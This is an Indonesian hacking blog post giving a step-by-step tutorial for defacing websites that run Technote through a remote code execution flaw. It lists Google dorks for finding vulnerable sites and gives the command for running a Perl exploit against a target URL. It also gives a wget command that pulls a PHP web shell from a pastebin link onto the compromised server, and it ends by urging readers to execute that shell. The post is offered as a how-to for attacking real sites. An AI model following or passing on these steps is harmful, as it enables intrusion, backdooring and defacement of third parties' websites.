Beranda  ›  Hacking  ›  tutorial

TUTORIAL DEFACE TECHNOTE RCE 0.4

Senin, 08 Juli 2019 Tulis Komentar

TUTORIAL DEFACE TECHNOTE RCE 0.4

Nelo.F4 - Tutorial deface technote RCE(Remote Code Execution)0.4, Hallo semua. selamat siang, pada hari yang cerah ini mimin akan share atau berbagi tentang cara deface RCE (REMOTE CODE EXECUTION) yang ada di bugnya technote itu sendiri h3h3, disini method yang mimin pake adalah bahasa perl untuk exploitnya. dan google untuk ngedorkingnya hehe.langsung saja ketutorialnya

Bahan - Bahan:
  • Smartphone atau Pc bisa juga lepi.
  • Termos atau termux dan cmd untuk menjalankan exploitnya
  • kopi atau sebats roks
  • dork 
  • Exploit RCE DISINI

DORK:
  • Bisa pake Bing dorker buatan mimin atau ngedork manual pake dork bibawah ini
  • inurl:/cgi-bin/technote/
  • inurl:".cgi?board=FREE_BOARD"
  • intext:"TECHNOTE-TOP"
syudah siap semua? nah hal pertama yang kalian harus lakukan yaitu ngedork di google. ngedork dolo sana. jika sudah akan seperti ini 

 
www.site.com/main.cgi?board=FREE_BOARD 

copy paste dulu exploit rce yang ada di atas kenotepad atau text editor lainya. lalu save menjadi exploit.pl

untuk user windows bisa menggunakan xampp terus kalian letakan exploit.plnya di folder xampp/perl/bin dan untuk pengguna termos ketikan perintah dibawah ini (untuk install perlnya)
$pkg install perl

syudah? sekarang buka cmd/termos kalian masing masing.
setelah terminal/cmd terbuka kalian ketikan perintah di bawah ini .
perl exploit.pl http://www.sitetarget.com/blabla/main.cgi?board=FREE_BOARD
 kalau vuln maka akan terlihat seperti gambar dibawah ini.


jika syudah seperti gambar diatas tinggal kalian ketikan perintah dibawah.
$ cd board 

nah jika syudah kalian ketikan lagi perintah dibawah untuk wget upload shell kalian masing masing.
$wget -O shell.php http://pastebin.com/raw/WjhkMRrT

jika berhasil kalian kekitak lagi
$ls 

maka hasilnya akan seperti gambar dibawah ini.


gambar diatas menandakan shell backdoor kalian sudah terupload. tinggal cek sitenya saja contoh seperti gambar dibawah ini


tinggal kalian eksekusi saja kalau sudah seperti gambar diatas heheh.
sudah sampai sini saja pertemuan kita kali ini. jika ada kesalahan mohon dimaafkan ya hehe - Nelo.F4

SPECIAL THANK TO

ALL MEMBER EXPLOSIONSQUADCYBER

MUHAMMAD MALIK 

SURABAYA HACKER LINK


THERE A PROBLEM? GOOGLE YOUR FRIEND

HAVE A NICE DAY - NELO.F4



Belum ada Komentar untuk "TUTORIAL DEFACE TECHNOTE RCE 0.4"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel